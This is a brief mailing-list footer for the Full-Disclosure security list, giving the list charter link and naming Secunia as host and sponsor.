Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/